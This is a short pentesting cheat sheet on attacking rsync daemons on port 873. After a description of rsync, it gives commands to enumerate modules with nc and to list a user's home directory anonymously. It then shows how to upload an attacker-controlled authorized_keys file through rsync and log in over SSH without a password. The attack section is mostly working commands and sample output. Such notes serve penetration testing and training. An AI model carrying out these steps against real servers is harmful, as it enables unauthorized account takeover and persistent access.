rsync (Port 873)

What is rsync?

Rsync is a fast and extraordinarily versatile file copying tool. It can copy locally, to/from another host over any remote shell, or to/from a remote rsync daemon. It offers a large number of options that control every aspect of its behavior and permit very flexible specification of the set of files to be copied. It is famous for its delta-transfer algorithm, which reduces the amount of data sent over the network by sending only the differences between the source files and the existing files in the destination. Rsync is widely used for backups and mirroring and as an improved copy command for everyday use.

nc

Enumerate directory names (when anonymous access enabled):

$ nc <remote_ip> 873

@RSYNCD: 31.0       <--- You receive this banner with the version from the server
@RSYNCD: 31.0       <--- Then you send the same info
#list               <--- Then you ask the sever to list
this_is_a_username  <--- The server starts enumerating
@RSYNCD: EXIT       <--- Sever closes the connection

rsync

Enumerate directory content:

$ rsync -av --list-only rsync://<remote_ip>/<user's_home_directory>

receiving incremental file list
drwxr-xr-x          4,096 2021/01/21 09:21:59 .
lrwxrwxrwx              9 2020/12/03 15:22:42 .bash_history -> /dev/null
-rw-r--r--            220 2019/04/18 00:12:36 .bash_logout
-rw-r--r--          3,526 2019/04/18 00:12:36 .bashrc
-rw-r--r--            807 2019/04/18 00:12:36 .profile

sent 20 bytes  received 136 bytes  24.00 bytes/sec
total size is 4,562  speedup is 29.24

Upload authorized_keys

If we have access to a user's home directory via rsync, we can upload authorized_keys that contains our public key, so that SSH won't ask us for password.

Generate RSA key pairs:

$ mkdir .ssh
$ cd .ssh
$ ssh-keygen

Prepare authorized_keys and upload the entire .ssh directory to the remote machine:

$ cd .ssh
$ cat id_rsa.pub > authorized_keys
$ cd ..
$ rsync -a --relative ./.ssh rsync://<remote_ip>/<user's_home_directory>/

SSH in:

$ chmod 600 .ssh/id_rsa
$ ssh -i .ssh/id_rsa <username>@<remote_ip>

Reference

rsync(1) - Linux man pagelinux.die.net

rsync(1) - Linux man page

873 - Pentesting Rsync - HackTricksbook.hacktricks.xyz

Pentesting Rsync - HackTricks